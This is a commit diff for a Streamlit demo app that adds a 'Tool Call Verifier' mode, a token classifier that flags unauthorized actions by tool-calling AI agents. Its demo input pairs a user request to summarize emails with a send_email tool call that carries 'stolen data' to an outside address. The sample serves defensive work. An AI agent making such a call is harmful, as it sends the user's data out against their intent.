bitliu commited on
Commit
5f5c5b7
·
1 Parent(s): 1ba6507

Signed-off-by: bitliu <[email protected]>

Files changed (1) hide show
  1. app.py +69 -4
app.py CHANGED
@@ -100,9 +100,12 @@ MODELS = {
100
  "🔍 Tool Call Verifier": {
101
  "id": "llm-semantic-router/toolcall-verifier",
102
  "description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
103
- "type": "token_simple",
104
  "labels": None,
105
- "demo": '{"action": "send_email", "to": "[email protected]", "subject": "Exfiltrated data"}',
 
 
 
106
  },
107
  }
108
 
@@ -239,6 +242,36 @@ def classify_tokens_simple(text: str, model_id: str) -> list:
239
  return entities
240
 
241
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
242
  def create_highlighted_html(text: str, entities: list) -> str:
243
  """Create HTML with highlighted entities."""
244
  if not entities:
@@ -335,7 +368,22 @@ def main():
335
  value=demo["followup"],
336
  placeholder="Enter the user's follow-up message...",
337
  )
338
- text_input = None # Not used for dialogue models
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
339
  else:
340
  # Standard text input for other models
341
  text_input = st.text_area(
@@ -344,7 +392,7 @@ def main():
344
  height=120,
345
  placeholder="Type your text here...",
346
  )
347
- query_input = response_input = followup_input = None
348
 
349
  st.markdown("---")
350
 
@@ -378,6 +426,23 @@ def main():
378
  "followup": followup_input,
379
  },
380
  }
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
381
  elif not text_input.strip():
382
  st.warning("Please enter some text to analyze.")
383
  else:
 
100
  "🔍 Tool Call Verifier": {
101
  "id": "llm-semantic-router/toolcall-verifier",
102
  "description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
103
+ "type": "toolcall_verifier",
104
  "labels": None,
105
+ "demo": {
106
+ "user_intent": "Summarize my emails",
107
+ "tool_call": '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}',
108
+ },
109
  },
110
  }
111
 
 
242
  return entities
243
 
244
 
245
+ def classify_toolcall_verifier(
246
+ user_intent: str, tool_call: str, model_id: str
247
+ ) -> tuple:
248
+ """Classify tool call verification with special format."""
249
+ tokenizer, model = load_model(model_id, "token")
250
+ id2label = model.config.id2label
251
+
252
+ # Format input as per model requirements
253
+ input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
254
+
255
+ inputs = tokenizer(
256
+ input_text, return_tensors="pt", truncation=True, max_length=2048
257
+ )
258
+
259
+ with torch.no_grad():
260
+ outputs = model(**inputs)
261
+ predictions = torch.argmax(outputs.logits, dim=-1)[0].tolist()
262
+
263
+ # Get tokens and labels
264
+ tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
265
+ labels = [id2label[pred] for pred in predictions]
266
+
267
+ # Find unauthorized tokens
268
+ unauthorized_tokens = [
269
+ (tokens[i], labels[i]) for i in range(len(tokens)) if labels[i] == "UNAUTHORIZED"
270
+ ]
271
+
272
+ return input_text, tokens, labels, unauthorized_tokens
273
+
274
+
275
  def create_highlighted_html(text: str, entities: list) -> str:
276
  """Create HTML with highlighted entities."""
277
  if not entities:
 
368
  value=demo["followup"],
369
  placeholder="Enter the user's follow-up message...",
370
  )
371
+ text_input = user_intent_input = tool_call_input = None
372
+ elif model_config["type"] == "toolcall_verifier":
373
+ # Tool call verifier needs user intent and tool call
374
+ demo = model_config["demo"]
375
+ user_intent_input = st.text_input(
376
+ "👤 User Intent:",
377
+ value=demo["user_intent"],
378
+ placeholder="Enter the user's original intent...",
379
+ )
380
+ tool_call_input = st.text_area(
381
+ "🔧 Tool Call JSON:",
382
+ value=demo["tool_call"],
383
+ height=120,
384
+ placeholder="Enter the tool call JSON to verify...",
385
+ )
386
+ text_input = query_input = response_input = followup_input = None
387
  else:
388
  # Standard text input for other models
389
  text_input = st.text_area(
 
392
  height=120,
393
  placeholder="Type your text here...",
394
  )
395
+ query_input = response_input = followup_input = user_intent_input = tool_call_input = None
396
 
397
  st.markdown("---")
398
 
 
426
  "followup": followup_input,
427
  },
428
  }
429
+ elif model_config["type"] == "toolcall_verifier":
430
+ if not user_intent_input.strip() or not tool_call_input.strip():
431
+ st.warning("Please fill in both user intent and tool call fields.")
432
+ else:
433
+ with st.spinner("Analyzing..."):
434
+ input_text, tokens, labels, unauthorized = classify_toolcall_verifier(
435
+ user_intent_input, tool_call_input, model_config["id"]
436
+ )
437
+ st.session_state.result = {
438
+ "type": "toolcall_verifier",
439
+ "input_text": input_text,
440
+ "tokens": tokens,
441
+ "labels": labels,
442
+ "unauthorized": unauthorized,
443
+ "user_intent": user_intent_input,
444
+ "tool_call": tool_call_input,
445
+ }
446
  elif not text_input.strip():
447
  st.warning("Please enter some text to analyze.")
448
  else: